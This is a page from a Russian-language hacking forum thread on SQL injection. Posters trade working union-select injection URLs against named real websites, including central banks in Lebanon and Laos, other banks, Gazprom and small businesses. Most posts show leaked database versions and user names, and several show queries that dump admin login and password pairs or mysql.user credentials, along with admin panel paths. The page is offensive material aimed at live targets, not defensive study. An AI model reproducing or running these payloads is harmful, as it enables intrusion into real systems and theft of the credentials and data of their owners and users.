SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. BaleHoK

    BaleHoK Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    399
    Likes Received:
    21
    Reputations:
    10
    Code:
    list-a-day.com/?Gamequarium&id=-868+or 1=0+union select 1,version(),3,4,5,6--
    Mysql=5

    Кто сможет обойти WAF просьба отписать в ПМ
     
  2. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    BANK OF LEBANON (Banque du Liban)
    Code:
    http://www.bdl.gov.lb/edata/subseries.asp?SIID=13+union+select+1,2,3,4,5,6,7,8+from+MSysAccessXML
     
    3 people like this.
  3. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    PR - 5
    user() [email protected]
    version() 5.0.77-log
    database() srdb01

    PR - 2
    user() nerdriu_grfnkmp@localhost
    version() 5.0.89-community
    database() nerdriu_nerdrium
     
    #12783 *uNkN0Wn*, 25 Aug 2010
    Last edited: 25 Aug 2010
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Мониторинг обменных пунктов

    http://wmrates.net/detail.php?xobmen=60+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
     
    _________________________
    1 person likes this.
  5. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    PR - 4
    user() [email protected]
    version() 5.0.81-log
    database() db316503927

    PR - 3
    user() extremebodyshapi@localhost
    version() 5.0.22
    database() extremebodyshaping

    Всё что вывел:)
     
    #12785 *uNkN0Wn*, 25 Aug 2010
    Last edited: 25 Aug 2010
  6. Marsipan

    Marsipan New Member

    Joined:
    10 Jun 2010
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.smdailyjournal.com/article_preview.php?title=DA:&id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15--
    4.0.25:::smdaily2:::smdaily2@localhost

    Code:
    http://www.bilet-da.ru/best.php?id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15--
    5.0.77:::biletda_ru:::biletdaru@localhost

    Code:
    http://www.dilhaidesi.com/lyrics/song.php?name=Ja%20Ni%20Tera%20Pyar%20Kudey&movie=Captain%20Bhangre%20Da&id=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,version(),database(),user())--
    5.1.33:::dilhaidesi_main:::dilhaidesi_main@localho st

    Code:
    http://www.biletda.ru/best.php?id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15--
    5.0.77:::biletda_ru:::biletdaru@localhost
     
    #12786 Marsipan, 25 Aug 2010
    Last edited by a moderator: 25 Aug 2010
    1 person likes this.
  7. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    PR - 3
    user() kandahar@localhost
    version() 5.0.82sp1
    database() kandahar
     
  8. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    gazprom
    http://www.msk-tr.gazprom.ru/news/jubilee/item.php?jubileeID=-43+union+select+1,2,3,4,group_concat(login,0x3A,password+SEPARATOR+0x0b),6,7,8,9+FROM+mtg131_main.users--

    Информация для модераторов. Первый раз когда я выкладывал эту скуль. там был MySQL 4. и таблицы были несбручены. Сейчас они обновились теперь у них MySQL 5*. Вобщем вот. раскрученная скуль.
     
  9. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://stim-parquet.ru/newspod.php?id=25&table=news_sait+where+1=2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14+from+st_news_sait

    :)
     
    1 person likes this.
  10. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    shop
    http://www.rsapc.com/projects/detail.php?id=-174+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--+++
     
    #12790 Koren, 25 Aug 2010
    Last edited by a moderator: 25 Aug 2010
  11. Marsipan

    Marsipan New Member

    Joined:
    10 Jun 2010
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    [email protected]:::voiturembeep:::5.0.90-log::
    Code:
    http://www.mpac.org/article.php?id=-725'+union+select+1,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23
    Sanilulu_nigeria@localhost:::sanilulu_nff:::5.0.91-community::
    Code:
    http://www.nigeriaff.com/Newsdisplay.php?ID=-167+union+select+1,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11
    [/B]

    [email protected]:::ntbkca:::5.0.51a-log::
    Code:
    http://www.battery-notebook.ca/info.php?pid=-5305'+union+select+1,2,3,4,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
    ithink@localhost:::ithinkmusic:::5.0.77::
    Code:
    http://dubkraftrecords.ithinkmusic.com/my-store/detail.php?r=-12039/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),3,4,5,6,7,8,9%23
    [/B]
     
    #12791 Marsipan, 25 Aug 2010
    Last edited by a moderator: 25 Aug 2010
  12. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    http://www.digitalpodcast.com/detail.php?id=-19468+union+select+version(),2,3--
     
  13. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Bank of the Lao P.D.R.
    Code:
    http://www.bol.gov.la/english/news_report.php?nid=-42+union+select+1,concat_ws(0x3a,version(),user(),database(),cast(user as char),cast(password as char)),3,4,5,6,7,8+from+mysql.user--
    p.s file_priv Y
     
    3 people like this.
  14. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Ну что, сиди- не сиди а начинать надо... Поддержим товарищей и пройдемся по банкам

    Banque Atlantique

    Code:
    http://www.banqueatlantique.net/index.php?parcours=article&rubrique=-1+union+select+1,2,concat_ws(0x3a,admin,password),4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18+from+webuser+--+
     
    #12794 Kusto, 26 Aug 2010
    Last edited: 26 Aug 2010
    1 person likes this.
  15. Marsipan

    Marsipan New Member

    Joined:
    10 Jun 2010
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    PR - 3
    Code:
    [B]http://www.kandahar-taos.com/property-detail.php?lid=-15+union+select+1,2,group_concat(username,char(58) ,password),4,5,6,7,8+from+admin--[/B]
    user() kandahar@localhost
    version() 5.0.82sp1
    database() kandahar

    PR - 3
    Code:
    http://extremebodyshaping.com/locations_main.php?lid=-12+union+select+1,group_concat(UserName,char(58),U serPwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+users--
    user() extremebodyshapi@localhost
    version() 5.0.22
    database() extremebodyshaping

    Code:
    extremebodyshaping.com/admin
    pr 4
    Code:
    http://www.desilassi.com/AtoZ.php?lid=-1+union+select+1,group_concat(username,char(58),pa ssword),3,4+from+administration_users--
    user() [email protected]
    version() 5.0.81-log
    database() db316503927
    Code:
    desilassi.com/admin
     
    #12795 Marsipan, 26 Aug 2010
    Last edited: 26 Aug 2010
  16. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    продолжим банковскую тему

    Banque BEMO

    Code:
    http://www.bemobank.com/bemo.php?id1=-12+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4+--+
     
    2 people like this.
  17. aces007

    aces007 New Member

    Joined:
    24 Aug 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28table_name+separator+0x3a%29,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_schema=0x636d323330363737+--+
    Code:
    http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28column_name+separator+0x3a%29,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x636c69656e7473+--+
    Code:
    http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%280x0b,id,0x3a,login,0x3a,pwd%29,8,9,10,11,12,13,14,15,16+from+clients+limit+0,20+--+
     
  18. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87

    PR 1


    PR 5




    PR 1 ТИЦ 10


    PR 3 ТИЦ 60


    PR 4 ТИЦ 250


    PR 3 ТИЦ 10


    PR 5 ТИЦ 70



    ТИЦ 10
     
    #12798 -PRIVAT-, 26 Aug 2010
    Last edited: 26 Aug 2010
    1 person likes this.
  19. %R00tKit%

    %R00tKit% New Member

    Joined:
    25 Aug 2010
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    Ну и я чтоле :)
    Code:
    http://www.romanchuk.com.ua/index.php?id=1001+and+1=2+union+select+1,2,3,unhex(hex(group_concat(login,0x3a,password))),5+from+admin--+
    Code:
    http://polvent.com/index.php?action=catalog&brand=2&id=58+and+1=2+union+select+1,2,3,group_concat(login,0x3a,password,0x0b),5,6,7,8,9,10,11,12,13+from+admin--+
    Code:
    http://mobilstyle.com.ua/view_news.php?id=1+and+1=2+union+select+concat_ws(0x0b,password),2,3,4,5+from+admin--+
    Code:
    http://nunhems.com.ua/kultury.php?id=47+and+1=2+union+select+1,2,3,4,5,6,7,8,group_concat(user,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users--+
    Code:
    http://inkata.lp.edu.ua/index.php?action=news&id=11+and+1=2+union+select+1,2,3,4,5,group_concat(login,0x3a,password),7,8+from+admin--+
     
  20. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    ну продолжим банковскую тему )

    USA Merrimack County Savings Bank

    Code:
    http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,version(),3,4,5--
    
    Database Version: 4.1.22-standard
    Database name: mcsbnhc_mcsb
    User name: mcsbnhc_ensky@localhost
    http://www.mcsbnh.com/admin/
     
    _________________________
    5 people like this.
Thread Status:
Not open for further replies.